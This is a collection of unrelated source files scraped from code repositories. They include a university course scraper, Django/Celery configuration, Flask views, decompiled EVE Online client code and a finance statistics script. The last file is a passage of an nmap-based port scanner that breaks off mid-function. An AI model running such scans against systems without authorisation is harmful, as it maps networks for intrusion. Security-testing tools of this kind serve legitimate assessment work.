| no_license | 15807857476/bogdata-2 | 9595609ea2ae5ae0a48c511f911df2498456467e | 1934cdfa234b77ca91e349b84688db113ff39e8c | refs/heads/master | 2023-05-26T19:10:18.439269 | 2019-05-24T02:50:41 | 2019-05-24T02:50:41 | 188,327,526 | 3 | 1 | null | 2023-05-22T21:37:27 | 2019-05-24T00:53:28 | Python | UTF-8 | Python | false | false | 6,277 | py | #coding:utf-8
import requests
from bs4 import BeautifulSoup
import threading
import re
import os
import xlwt3
headers = {
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive'}
def Get_Quarter():
statue=True
while statue:
try:
html=requests.get('https://duapp2.drexel.edu/webtms_du/app?page=Home&service=page',headers=headers,timeout=30).text
statue=False
except:
continue
table=BeautifulSoup(html,'lxml').find_all('table',attrs={'class':'termPanel'})
quarter={}
for item in table[0].find_all('a'):
quarter[item.get_text()]='https://duapp2.drexel.edu'+item.get('href')
for item in table[1].find_all('a'):
quarter[item.get_text()]='https://duapp2.drexel.edu'+item.get('href')
return quarter
def Get_College(url):
statue=True
while statue:
try:
html=requests.get(url,headers=headers,timeout=30).text
statue=False
except:
continue
table=BeautifulSoup(html,'lxml').find('div',id='sideLeft').find_all('a')
colleges={}
for item in table:
colleges[item.get_text()]='https://duapp2.drexel.edu'+item.get('href')
return colleges
def Get_subjects(url):
statue=True
while statue:
try:
html=requests.get(url,headers=headers,timeout=30).text
statue=False
except:
continue
table=BeautifulSoup(html,'lxml').find('table',attrs={'class':'collegePanel'}).find_all('a')
subjects={}
for item in table:
subjects[item.get_text()]='https://duapp2.drexel.edu'+item.get('href')
return subjects
class CourseInfor(threading.Thread):
def __init__(self,url,name):
super(CourseInfor,self).__init__()
self.url=url
self.name=name
def run(self):
statue=True
while statue:
try:
html=requests.get(self.url,headers=headers,timeout=30).text
statue=False
except:
continue
table=BeautifulSoup(html,'lxml').find('td',attrs={'align':'center'}).find('table').find_all('tr')
self.course_list=[]
courses=[]
for item in table[1:-1]:
course=self.subject_parser(item)
if course==False:
continue
courses.append(course)
for course in courses:
course=self.course_parser(course)
self.course_list.append(course)
print('------'+self.name+'--OK')
def course_parser(self,course):
statue=True
while statue:
try:
html=requests.get(course['url'],headers=headers,timeout=30).text
statue=False
except:
continue
soup=BeautifulSoup(html,'lxml').find('table',attrs={'align':'center','valign':'top'})
baseInforTable=soup.find('td',attrs={'align':'left'}).find_all('td',attrs={'align':'center'})
trs=baseInforTable[0].find_all('tr')
lists=['SubjectCode','CourseNumber','Section','Credits','Title','Campus','Instructors','Instruction_Type','Instruction_Method','Max_Enroll','Enroll','Section_Comments']
for num in range(len(lists)):
try:
course[lists[num]]=trs[num+1].find_all('td')[1].get_text()
except:
course[lists[num]]='--'
table=baseInforTable[1].find('tr',attrs={'class':'even'}).find_all('td')
course['Building']=table[-2].get_text()
course['Room']=table[-1].get_text()
subjectInforText=soup.find('td',attrs={'align':'center','valign':'top'}).get_text()
reText={'College':'College:([\s\S]*)Department','Restrictions':'Restrictions:([\s\S]*)Co-Requisites','Co-Requisites':'Co-Requisites:([\s\S]*)Pre-Requisites','Pre-Requisites':'Pre-Requisites:([\s\S]*)Repeat Status','Repeat Status':'Repeat Status:([\s\S]*)'}
for key in reText:
try:
course[key]=re.findall(reText[key],subjectInforText)[0]
except:
course[key]='--'
return course
def subject_parser(self,item):
course={}
try:
url='https://duapp2.drexel.edu'+item.find('a').get('href')
except:
return False
course['url']=url
course['CRN']=item.find('a').get_text()
course['Times']=item.find('table').get_text()
return course
def Get_Course(Quarter,college,subjects):
print(Quarter+'--'+college+'--Start')
excel=xlwt3.Workbook()
threadings=[]
for subject in subjects:
work=CourseInfor(subjects[subject], subject)
threadings.append(work)
for work in threadings:
work.setDaemon(True)
work.start()
for work in threadings:
work.join()
sheet=excel.add_sheet(college)
count=0
lists=['SubjectCode','CourseNumber','CRN','Section','Credits','Times','Title','Campus','Instructors','Instruction_Type'
,'Instruction_Method','Max_Enroll','Enroll','Section_Comments','Building','Room','College','Restrictions','Co-Requisites','Pre-Requisites','Repeat Status','url']
for work in threadings:
for course in work.course_list:
for num in range(len(lists)):
sheet.write(count,num,course[lists[num]])
count+=1
print(Quarter+'--'+college+'--OK')
excel.save(Quarter+'/'+college+'.xls')
def main():
quarter=Get_Quarter()
for key in quarter:
colleges=Get_College(quarter[key])
try:
os.mkdir(key)
except:
print('--')
excel=xlwt3.Workbook()
threadings=[]
for college in colleges:
subjects=Get_subjects(colleges[college])
work=threading.Thread(target=Get_Course,args=(key, college, subjects))
threadings.append(work)
for work in threadings:
work.setDaemon(True)
work.start()
for work in threadings:
work.join()
print('----------'+key+'--OK----------')
main()
| [
"[email protected]"
]
| |
139bab4db8371e55144c6a767edd8121e9e1726d | 817f7dfb035af90b4c7f810c72eb7b407ea28c99 | /pingdumb/taskapp/celery.py | 7b13583c61674dfea5219ebd72f04285f69c7100 | [
"MIT"
]
| permissive | rubythonode/pingdumb-django | bd7e361a7d6886db81d9bdad78ef62d375ad768a | 750a26f7c55eb176f6fd0f5b655751ee2d114d9e | refs/heads/master | 2021-01-12T01:51:18.192362 | 2016-12-14T04:50:42 | 2016-12-14T04:50:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,110 | py |
from __future__ import absolute_import
import os
from celery import Celery
from django.apps import apps, AppConfig
from django.conf import settings
if not settings.configured:
# set the default Django settings module for the 'celery' program.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'config.settings.local') # pragma: no cover
app = Celery('pingdumb')
class CeleryConfig(AppConfig):
name = 'pingdumb.taskapp'
verbose_name = 'Celery Config'
def ready(self):
# Using a string here means the worker will not have to
# pickle the object when using Windows.
app.config_from_object('django.conf:settings')
installed_apps = [app_config.name for app_config in apps.get_app_configs()]
app.autodiscover_tasks(lambda: installed_apps, force=True)
if hasattr(settings, 'RAVEN_CONFIG'):
# Celery signal registration
from raven import Client as RavenClient
from raven.contrib.celery import register_signal as raven_register_signal
from raven.contrib.celery import register_logger_signal as raven_register_logger_signal
raven_client = RavenClient(dsn=settings.RAVEN_CONFIG['DSN'])
raven_register_logger_signal(raven_client)
raven_register_signal(raven_client)
if hasattr(settings, 'OPBEAT'):
from opbeat.contrib.django.models import client as opbeat_client
from opbeat.contrib.django.models import logger as opbeat_logger
from opbeat.contrib.django.models import register_handlers as opbeat_register_handlers
from opbeat.contrib.celery import register_signal as opbeat_register_signal
try:
opbeat_register_signal(opbeat_client)
except Exception as e:
opbeat_logger.exception('Failed installing celery hook: %s' % e)
if 'opbeat.contrib.django' in settings.INSTALLED_APPS:
opbeat_register_handlers()
@app.task(bind=True)
def debug_task(self):
print('Request: {0!r}'.format(self.request)) # pragma: no cover
| [
"[email protected]"
]
| |
0eca868fb731e2726e52062354a6937d43dade2f | cc2bb9ccc66783ac7d37454e4784df5e4a2d80f4 | /close_server_one.py | 34b036b30e1c44c412f1356dfc39352cae3581da | []
| no_license | ronnyzh/Tornado_Server | f308b7e9c2112167b04cbe324e37b1f891999187 | 42112d39e4dea128d059dbfa53c410f3774dc4b1 | refs/heads/master | 2021-05-22T22:10:26.694262 | 2020-04-04T23:39:14 | 2020-04-04T23:39:14 | 253,118,839 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 393 | py | # -*- coding:utf-8 -*-
# !/bin/python
"""
Author: ronnyzh
Date: 2019/11/15
Revision: 1.0.0
Description: Description
"""
from model.model_redis import getInst
from define.define_redis_key import *
IP = '192.168.50.2'
PORT = '9797'
if __name__ == '__main__':
redis = getInst()
ipKey = Key_Server_Order % ('%s:%s' % (IP, PORT))
redis.lpush(ipKey, 'closeServer')
| [
"[email protected]"
]
| |
c336b550745a3945d4d397f07f31e0af46fe95d7 | 8517c5849cec02cfd52d5a20d8c5468227f60c0d | /kozmic/repos/views.py | 3504ff09546983cc581849ca6a165f7e6b3613e0 | []
| no_license | aromanovich/kozmic-ci | 87475a27c3b47f0e4f226aef9856b3f39ed911e5 | 368ceb992b7b9b6ceb099570f9291655cad9e96c | refs/heads/master | 2021-01-19T02:00:55.573742 | 2016-06-14T04:45:10 | 2016-06-14T04:45:10 | 14,984,166 | 26 | 6 | null | 2016-06-14T04:45:10 | 2013-12-06T14:03:31 | Python | UTF-8 | Python | false | false | 4,622 | py | import datetime
import logging
import collections
from flask import (current_app, flash, request, render_template, redirect,
url_for, abort)
from flask.ext.login import current_user
from kozmic import db
from kozmic.models import User, Organization, Project, DeployKey
from . import bp
logger = logging.getLogger(__name__)
@bp.route('/')
def index():
user_repositories = current_user.repositories.with_entities(
db.literal(current_user.gh_login).label('gh_owner_login'),
User.Repository.gh_id.label('gh_id'),
User.Repository.gh_full_name.label('gh_full_name'))
user_org_repositories = current_user.organizations.join(
Organization.Repository
).with_entities(
Organization.gh_login.label('gh_owner_login'),
Organization.Repository.gh_id.label('gh_id'),
Organization.Repository.gh_full_name.label('gh_full_name'),
)
repositories = user_repositories.union_all(user_org_repositories).subquery()
repositories_without_project = db.session.query(repositories).outerjoin(
Project, repositories.c.gh_id == Project.gh_id
).filter(Project.id == None).all()
repositories_by_owner = collections.defaultdict(list)
for gh_owner_login, gh_id, gh_full_name in repositories_without_project:
repositories_by_owner[gh_owner_login].append((gh_id, gh_full_name))
return render_template(
'repos/index.html', repositories_by_owner=repositories_by_owner)
@bp.route('/sync/')
def sync():
"""Updates the organizations and repositories to which
the user has admin access.
"""
# Delete all the old repositories and organizations
# (don't do batch delete to let ORM-level cascades work)
for repo in current_user.repositories:
db.session.delete(repo)
for org in current_user.organizations:
db.session.delete(org)
# Fill the user's organizations and their repositories
gh_orgs, gh_repos_by_org_id = current_user.get_gh_org_repos()
for gh_org in gh_orgs:
org = Organization(
gh_id=gh_org.id,
gh_login=gh_org.login,
gh_name=gh_org.name)
for gh_repo in gh_repos_by_org_id[gh_org.id]:
repo = Organization.Repository.from_gh_repo(gh_repo)
org.repositories.append(repo)
current_user.organizations.append(org)
# Fill the user's own repositories
for gh_repo in current_user.get_gh_repos():
repo = User.Repository.from_gh_repo(gh_repo)
current_user.repositories.append(repo)
current_user.repos_last_synchronized_at = datetime.datetime.utcnow()
db.session.commit()
return redirect(url_for('.index'))
@bp.route('/<int:gh_id>/on/', methods=('POST',))
def on(gh_id):
"""Creates :class:`app.models.Project` for GitHub repository
with `gh_id`.
"""
# First try to find the user's repository with `gh_id`
repo = (current_user.repositories
.filter(User.Repository.gh_id == gh_id).first())
# If not found, try to find such a repository among
# the user organizations' repositories
repo = repo or (current_user.organizations
.join(Organization.Repository)
.filter(Organization.Repository.gh_id == gh_id)
.with_entities(Organization.Repository).first())
if not repo:
abort(404)
if Project.query.filter_by(gh_id=repo.gh_id).first():
# If project for repository with `gh_id` already exists,
# we should show page where the user can ask for an invite
# to the existing project.
# For now just show 400
abort(400)
project = Project(
owner=current_user,
gh_id=repo.gh_id,
gh_name=repo.gh_name,
gh_full_name=repo.gh_full_name,
gh_login=repo.parent.gh_login,
gh_ssh_clone_url=repo.gh_ssh_clone_url,
gh_https_clone_url=repo.gh_https_clone_url,
is_public=repo.is_public)
db.session.add(project)
ok_to_commit = True
if not project.is_public:
project.deploy_key = DeployKey(passphrase=project.passphrase)
ok_to_commit = ok_to_commit and project.deploy_key.ensure()
ok_to_commit = ok_to_commit and project.sync_memberships_with_github()
if ok_to_commit:
db.session.commit()
return redirect(url_for('projects.settings', id=project.id))
else:
db.session.rollback()
flash('Sorry, failed to create a project. Please try again later.',
'warning')
return redirect(url_for('.index'))
| [
"[email protected]"
]
| |
8dea07b740dc7aa5edb7b8bddc428d35e75352e9 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_207/ch63_2020_04_27_14_28_14_916924.py | 933bea65d7d30470bdf2ae03c973f2452f1202e2 | []
| no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 96 | py | def nome_usuario (string):
pos = string.find('@')
nome = string[:pos]
return nome
| [
"[email protected]"
]
| |
945f3b5e2ce68a78a710408a838215d972d40c1a | 3740de0d6e43ea140fc09ab314e4c492603ba185 | /scripts/sources/s_generalized_flam_toy.py | 7cc7fd1ff125b384c9bb6a7535b3cfea5e5b6ec7 | [
"MIT"
]
| permissive | s0ap/arpmRes | 29c60c65fd3e11be1cc31d46494e5b3ebf6e05ab | ddcc4de713b46e3e9dcb77cc08c502ce4df54f76 | refs/heads/master | 2022-02-16T05:01:22.118959 | 2019-08-20T16:45:02 | 2019-08-20T16:45:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,933 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.4'
# jupytext_version: 1.1.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # s_generalized_flam_toy [<img src="https://www.arpm.co/lab/icons/icon_permalink.png" width=30 height=30 style="display: inline;">](https://www.arpm.co/lab/redirect.php?code=s_generalized_flam_toy&codeLang=Python)
# For details, see [here](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy).
# +
import numpy as np
from arpym.statistics import objective_r2, simulate_normal
from arpym.tools import solve_riccati
# -
# ## [Input parameters](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-parameters)
# +
sig2 = np.array
rho = 0.3
epsi = 0.45
s = np.array([[0.3], [0.1]])
w = np.array([[1], [-3]])
sig = 1
sig2 = np.array([[1, 0.5, epsi, epsi],
[0.5, 1, epsi, epsi],
[epsi, epsi, 1, rho],
[epsi, epsi, rho, 1]])
# -
# ## [Step 1](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-implementation-step01): conditional expectation and covariance
# +
def cond_exp_x(s, k=2, sig2=sig2):
return sig2[:2, -k:] @ np.linalg.solve(sig2[-k:, -k:], s)
def cond_cov_x(k=2, sig2=sig2):
return sig2[:2, :2] - sig2[:2, -k:] @ np.linalg.solve(sig2[-k:, -k:],
sig2[:2, -k:].T)
cond_mu_x = cond_exp_x(s)
cond_sig2_x = cond_cov_x()
# -
# ## [Step 2](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-implementation-step02): Max of cond. info ratio and combination at which is attained
w_sig = sig * np.linalg.solve(cond_sig2_x, cond_mu_x) / \
np.sqrt(cond_mu_x.T @ np.linalg.solve(cond_sig2_x, cond_mu_x))
max_ir = w_sig.T @ cond_mu_x / np.sqrt(w_sig.T @ cond_sig2_x @ w_sig)
# ## [Step 3](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-implementation-step03): Max of cond. info ratio via flam and transfer coefficient
max_ir_flam = np.sqrt(cond_mu_x.T @ np.linalg.solve(cond_sig2_x,
cond_mu_x))
ir_arb = w.T @ cond_mu_x / np.sqrt(w.T @ cond_sig2_x @ w)
tc = ir_arb / max_ir_flam
# ## [Step 4](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-implementation-step04): Max. unconditional info ratios
# +
def uncond_max_ir(k, sig2=sig2):
# Monte Carlo scenarios for the signals
s_j = simulate_normal(np.zeros((2)), sig2[-2:, -2:], 1000).T
cond_mu_x_j = cond_exp_x(s_j[:k, :], k, sig2)
# Monte Carlo scenarios for the conditioned max info ratio
max_ir_j = cond_mu_x_j.T @ \
np.linalg.solve(cond_cov_x(k, sig2),
cond_mu_x_j)
return np.sqrt(np.trace(max_ir_j) / 1000)
uncond_maxir_12 = uncond_max_ir(2)
uncond_maxir_1 = uncond_max_ir(1)
uncond_maxir_2 = uncond_max_ir(1)
print(uncond_maxir_12**2 - (uncond_maxir_1**2 + uncond_maxir_2**2))
# verify that (epsi << 1) implies weak signals
sig2_weak = np.array([[1, 0.5, 0.1, 0.1],
[0.5, 1, 0.1, 0.1],
[0.1, 0.1, 1, rho],
[0.1, 0.1, rho, 1]])
print(cond_cov_x(2, sig2_weak))
print(sig2[:2, :2])
# independent signals (rho = 0) and weak correlation (epsi << 1)
sig2_weak_ind = np.array([[1, 0.5, 0.1, 0.1],
[0.5, 1, 0.1, 0.1],
[0.1, 0.1, 1, 0],
[0.1, 0.1, 0, 1]])
maxir_12_weak_ind = uncond_max_ir(2, sig2_weak_ind)
maxir1_weak_ind = uncond_max_ir(1, sig2_weak_ind)
maxir2_weak_ind = uncond_max_ir(1, sig2_weak_ind)
print(maxir_12_weak_ind**2 - (maxir1_weak_ind**2 +
maxir2_weak_ind**2))
# -
# ## [Step 5](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-implementation-step05): information coefficients
# +
def ic(k, sig2=sig2):
return np.sqrt(2 * objective_r2(np.arange(k), sig2, 2, sig2[:2, :2]))
ic_12 = ic(2)
ic_1 = ic(1)
ic_2 = ic(1)
print(ic_12**2 - (ic_1**2 + ic_2**2))
# independent signals (rho = 0)
sig2_ind = np.array([[1, 0.5, epsi, epsi],
[0.5, 1, epsi, epsi],
[epsi, epsi, 1, 0],
[epsi, epsi, 0, 1]])
ic_12_ind = ic(2, sig2_ind)
ic_1_ind = ic(1, sig2_ind)
ic_2_ind = ic(1, sig2_ind)
print(ic_12_ind**2 - (ic_1_ind**2 + ic_2_ind**2))
# -
# ## [Step 6](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-implementation-step06): linkage matrix
# +
def linkage(sig2=sig2):
return np.linalg.solve(solve_riccati(sig2[:2, :2]),
np.linalg.solve(solve_riccati(sig2[2:, 2:]).T,
sig2[:2, 2:].T).T)
p_s_x = linkage(sig2)
# -
# ## [Step 7](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-implementation-step07): Fundamental law of active management (weak signals)
# +
sig2_weak = np.array([[1, 0.5, 0.1, 0.1],
[0.5, 1, 0.1, 0.1],
[0.1, 0.1, 1, rho],
[0.1, 0.1, rho, 1]])
p_s_x_weak = linkage(sig2_weak_ind)
# information coefficient
ic_linkage = np.sqrt(np.trace(p_s_x_weak @ p_s_x_weak.T))
# max information ratio
s_tilde = np.linalg.solve(solve_riccati(sig2_weak[2:, 2:]), s)
maxir_linkage = uncond_max_ir(2, sig2=sig2_weak)
print(maxir_linkage**2 - ic_linkage**2)
# -
# ## [Step 8](https://www.arpm.co/lab/redirect.php?permalink=s_generalized_flam_toy-implementation-step08): Fundamental law of active management (weak and ind. signals)
# +
p_s_x_weak_ind = linkage(sig2_weak_ind)
# information coefficient (single signal)
ic_linkage_1 = np.sqrt(np.trace(p_s_x_weak[:, [0]] @ p_s_x_weak[:, [0]].T))
print(ic_linkage_1 * np.sqrt(2) - maxir_12_weak_ind)
| [
"[email protected]"
]
| |
34dadc42e9085d239b0e37efcf94d7e7460e7403 | 8fcc27160f8700be46296568260fa0017a0b3004 | /client/eve/client/script/environment/spaceObject/entityShip.py | 253efe958a9487e51db0b4662828ae06dbef0567 | []
| no_license | connoryang/dec-eve-serenity | 5d867f4eedfa896a4ef60f92556356cafd632c96 | b670aec7c8b4514fc47cd52e186d7ccf3aabb69e | refs/heads/master | 2021-01-22T06:33:16.303760 | 2016-03-16T15:15:32 | 2016-03-16T15:15:32 | 56,389,750 | 1 | 0 | null | 2016-04-16T15:05:24 | 2016-04-16T15:05:24 | null | UTF-8 | Python | false | false | 3,545 | py | #Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\eve\client\script\environment\spaceObject\entityShip.py
import blue
import destiny
from eve.client.script.environment.spaceObject.spaceObject import SpaceObject
from eve.client.script.environment.spaceObject.ship import Ship
from eve.client.script.environment.model.turretSet import TurretSet
import eve.common.lib.appConst as const
import evetypes
class EntityShip(Ship):
launcherTypeCache = {}
def __init__(self):
Ship.__init__(self)
self.gfxTurretID = None
self.fitted = False
self.typeID = None
self.modules = {}
self.model = None
self.launcherTypeID = None
def LoadModel(self, fileName = None, loadedModel = None):
godma = self.sm.GetService('godma')
godmaStateManager = godma.GetStateManager()
godmaType = godmaStateManager.GetType(self.typeID)
self.turretTypeID = godmaType.gfxTurretID
missileTypeID = godmaType.entityMissileTypeID
self.launcherTypeID = self.DetermineLauncherTypeFromMissileID(self.typeID, missileTypeID)
SpaceObject.LoadModel(self)
def Assemble(self):
Ship.Assemble(self)
self.FitBoosters(isNPC=True)
self.SetupSharedAmbientAudio()
def DetermineLauncherTypeFromMissileID(self, typeID, missileTypeID):
launcherType = self.launcherTypeCache.get(missileTypeID, None)
if launcherType:
return launcherType
clientDogma = self.sm.GetService('clientDogmaStaticSvc')
usesMissiles = clientDogma.TypeHasEffect(typeID, const.effectMissileLaunchingForEntity)
if not usesMissiles:
return
godma = self.sm.GetService('godma')
group = int(godma.GetTypeAttribute2(missileTypeID, const.attributeLauncherGroup))
for typeID in evetypes.GetTypeIDsByGroup(group):
if typeID in cfg.invmetatypesByParent:
launcherType = typeID
self.launcherTypeCache[missileTypeID] = launcherType
break
return launcherType
def LookAtMe(self):
if self.model is None:
return
if not self.fitted:
self.FitHardpoints()
def FitHardpoints(self, blocking = False):
if self.model is None:
self.LogWarn('FitHardpoints - No model')
return
if self.fitted:
return
self.fitted = True
turretLocatorCount = int(self.model.GetTurretLocatorCount())
if self.launcherTypeID:
launcherSet = TurretSet.FitTurret(self.model, self.launcherTypeID, turretLocatorCount, count=1)
self.modules[0] = launcherSet
turretLocatorCount = max(turretLocatorCount - 1, 1)
newTurretSet = TurretSet.FitTurret(self.model, self.turretTypeID, -1, count=turretLocatorCount)
if newTurretSet is not None:
self.modules[self.id] = newTurretSet
def Release(self):
if self.released:
return
for turretPair in self.modules.itervalues():
if turretPair is not None:
turretPair.Release()
turretPair.owner = None
self.modules = {}
Ship.Release(self)
class EntitySleeper(EntityShip):
def FitHardpoints(self, blocking = False):
if self.launcherTypeID:
self.launcherTypeID = 0
EntityShip.FitHardpoints(self)
| [
"[email protected]"
]
| |
4498670807eaeaf54a06134d1ce03533c8bc8c45 | ca8167a83eaec916437c0fdd757a76bb0441a5a3 | /envs/dmlab/dmlab_populate_cache.py | 495f3a7c761a2d9edb2d33b8079a14dbf225b782 | [
"Apache-2.0"
]
| permissive | Zhehui-Huang/scalable_agent | b470afe0130e95d2e63e521abd7bf61016e5e358 | 505909ad9f2d3e9bce8bb9201e05e780002428df | refs/heads/master | 2022-04-25T23:21:40.302551 | 2020-02-03T07:43:35 | 2020-02-03T07:43:35 | 257,515,137 | 0 | 0 | Apache-2.0 | 2020-04-21T07:33:26 | 2020-04-21T07:33:25 | null | UTF-8 | Python | false | false | 850 | py | import sys
from algorithms.utils.multi_env import MultiEnv
from envs.dmlab.dmlab_utils import DmlabGymEnv
from utils.utils import log
def main():
def make_env(env_config):
env = DmlabGymEnv('contributed/dmlab30/rooms_watermaze', 4)
return env
num_envs = 64
num_workers = 16
multi_env = MultiEnv(num_envs, num_workers, make_env, stats_episodes=100)
num_resets = 0
try:
while True:
multi_env.reset()
num_resets += 1
num_envs_generated = num_resets * num_envs
log.info('Generated %d environments...', num_envs_generated)
except (Exception, KeyboardInterrupt, SystemExit):
log.exception('Interrupt...')
finally:
log.info('Closing env...')
multi_env.close()
return 0
if __name__ == '__main__':
sys.exit(main())
| [
"[email protected]"
]
| |
70d21f0315e69b783a6c51389ee8a14057eec12e | ae08a53864b4ec19458eae7bdf072b91b489e595 | /nina-service/app/api/v1/users/messenger.py | d8808844ee411840587e5feb56cf0cb9c1f54339 | []
| no_license | OscarGibson/docker-messenger-test | aee90378691527fd4f7156c3b16490393a548e14 | f04c3d932818b16fa6a304e41ff5492a6d67ccb7 | refs/heads/master | 2022-12-09T07:49:10.324014 | 2018-09-12T07:04:20 | 2018-09-12T07:04:20 | 148,104,678 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 487 | py | import requests
class Messenger:
def __init__(self, receiver, *args, **kwargs):
self.receiver = receiver
self.headers = {
'content-type' : 'application/json',
}
def set_headers(self, request_object):
self.headers['Authorization'] = request_object.headers.get('Authorization')
def send(self, data= {}, method= 'get', params= ''):
# print("SENFING: ", self.receiver % params)
return getattr(requests, method)(self.receiver % params, json= data, headers= self.headers) | [
"[email protected]"
]
| |
1da694b5ea387596423c38640e879d0c7a989f94 | 4142b8c513d87361da196631f7edd82f11465abb | /python/round481/978C.py | 507c51c1f9c84ef6c7c7bff283409bd7ae7ba262 | []
| no_license | npkhanhh/codeforces | b52b66780426682ea1a3d72c66aedbe6dc71d7fe | 107acd623b0e99ef0a635dfce3e87041347e36df | refs/heads/master | 2022-02-08T17:01:01.731524 | 2022-02-07T10:29:52 | 2022-02-07T10:29:52 | 228,027,631 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 423 | py | from sys import stdin
import bisect
n, m = list(map(int, stdin.readline().split()))
a = list(map(int, stdin.readline().split()))
b = list(map(int, stdin.readline().split()))
p_a = [0]*n
p_a[0] = a[0]
for i in range(1, n):
p_a[i] = a[i] + p_a[i-1]
p_a = [0]+p_a
for i in b:
dorm = bisect.bisect(p_a, i)
room = i - p_a[dorm-1]
if room == 0:
dorm -= 1
room = a[dorm-1]
print(dorm, room)
| [
"[email protected]"
]
| |
975cc3aa400100762371f0e3f43f4b6231beca20 | 05805ab879654cdcf61df3653847f435b624dc77 | /Dictator_service/bin_gui/main_class_based_backup.py | 9162aa49b03b5749bea6d70fda67e3c8bdbf4208 | []
| no_license | Wuwqhnsya/Dictator | 3d57db6bc0138464884ddc9fe7378907ab86e3ef | 45388fec03a4acdac3620611b3bccfa3c991d65f | refs/heads/master | 2020-04-28T21:57:39.309165 | 2019-01-28T19:10:28 | 2019-01-28T19:10:28 | 175,600,478 | 1 | 0 | null | 2019-03-14T10:34:02 | 2019-03-14T10:34:02 | null | UTF-8 | Python | false | false | 31,366 | py | #!/usr/bin/python
import time
import threading
import time
import nmap
import multiprocessing
import os
import sys
import ConfigParser
#import mysql.connector
import MySQLdb
import atexit
import IPtable
import texttable as tt
import Simple_Logger
r = '\033[31m' #red
b = '\033[34m' #blue
g = '\033[32m' #green
y = '\033[33m' #yellow
m = '\033[34m' #magenta
c = '\033[36m' #magenta
e = '\033[0m' #end
def test():
print "\n\n\n Exiting Bye Bye !!!"
atexit.register(test)
class NmapScan:
def __init__(self):
self.IP=""
self.PORT=None
self.SWITCH=""
self.CURRENT_PROJECT_ID=""
self.takescan=""
self.N=4
self.Port_Divisior=7500
self.Pause_Flag=False
self.Stop_Flag=False
self.ipcount=0
self.IPtable=IPtable.IPtable()
self.method_id="INIT"
self.Thread_pool=[]
self.retry_count=0
self.max_retries=3
self.simple_logger=Simple_Logger.SimpleLogger()
self.lock=threading.Lock()
self.folder_name=os.path.join("Results","Data_")
def generate_Error_log(status,ipx,portx,pid):
try:
print "Logged exception"
'''self.data_path=self.folder_name+str(self.pid)
error_file=str(project_id)+"_error.txt"
error_file_path = os.path.join(self.data_path, error_file)
self.lock.acquire()
simple_logger.log(error_file_path,"Error -->,Status:Error Complete,Host :"+str(ipx)+",Port:"+str(portx)+",Project id :"+str(pid)+"\n")
self.lock.release()'''
except Exception ,ee:
print "Exception while writing to error file :"+str(ee)
def portscanner(self,ipx,portx): #switch,current_project_id
nm=nmap.PortScanner()
try:
if portx=="top_ports":
nm.scan(ipx,None,self.SWITCH)
else:
nm.scan(ipx,portx,self.SWITCH)
except Exception ,ex:
self.seperator()
print r+"\n\nEXCEPTION in nmap built in utiliry--> "+str(ex) +e
self.seperator()
self.seperator()
print g+"\n\nRe-attempts made on this record :"+str(self.retry_count)+e
self.seperator()
self.retry_count =self.retry_count+1
if (self.retry_count < self.max_retries):
print g+"\n\nRe-attemting for the failed record"+e
self.IPtable.UpdateStatus('incomplete',ipx,portx,int(self.CURRENT_PROJECT_ID))
else:
print g+"\n\nMax re attempts exceeded - Updating status to ERror-complete"+e
print r+"\n\nPlease see the error log for further details.IT would mention the host for which the nmap module failed"+e
self.IPtable.UpdateStatus('error-complete',ipx,portx,int(self.CURRENT_PROJECT_ID))
self.generate_Error_log('error-complete',ipx,portx,int(self.CURRENT_PROJECT_ID))
return 0
try:
temp=nm.scanstats()['uphosts']
if (int(temp) != 0):
host=ipx
if 'tcp' in nm[host].all_protocols():
self.seperator()
print "Result for IP : " + host
print('Protocol : TCP' )
for kk in nm[host]['tcp'].keys():
if (nm[host]['tcp'][kk]['name'])=='':
nm[host]['tcp'][kk]['name']='unknown'
lport = nm[ipx]['tcp'].keys()
lport.sort()
for port in lport:
print b+'port : ' +y+str(port) + ' \t ' + g+ nm[host]['tcp'][port]['state'] +' \t' +r +'' + nm[host]['tcp'][port]['name'] +e
self.seperator()
sd=nm.csv()
#print "Reached at update point "
try :
self.IPtable.Update(sd,portx,ipx,int(self.CURRENT_PROJECT_ID))
except Exception ,ee :
self.print_Log("Exception in update "+str(ee))
print "EXception Update main "+str(ee)
if 'udp' in nm[host].all_protocols():
self.seperator()
#self.IPtable.Update(sd,portx,ipx,int(self.CURRENT_PROJECT_ID))
print "Result for IP : " + host
print('Protocol : UDP' )
lport = nm[ipx]['udp'].keys()
lport.sort()
for kk in nm[host]['tcp'].keys():
if (nm[host]['udp'][kk]['name'])=='':
nm[host]['tcp'][kk]['name']='unknown'
for port in lport:
print b+'port : ' +y+str(port) + ' \t ' + g+ nm[host]['udp'][port]['state'] +' \t' +r +'' + nm[host]['udp'][port]['name'] +e
self.seperator()
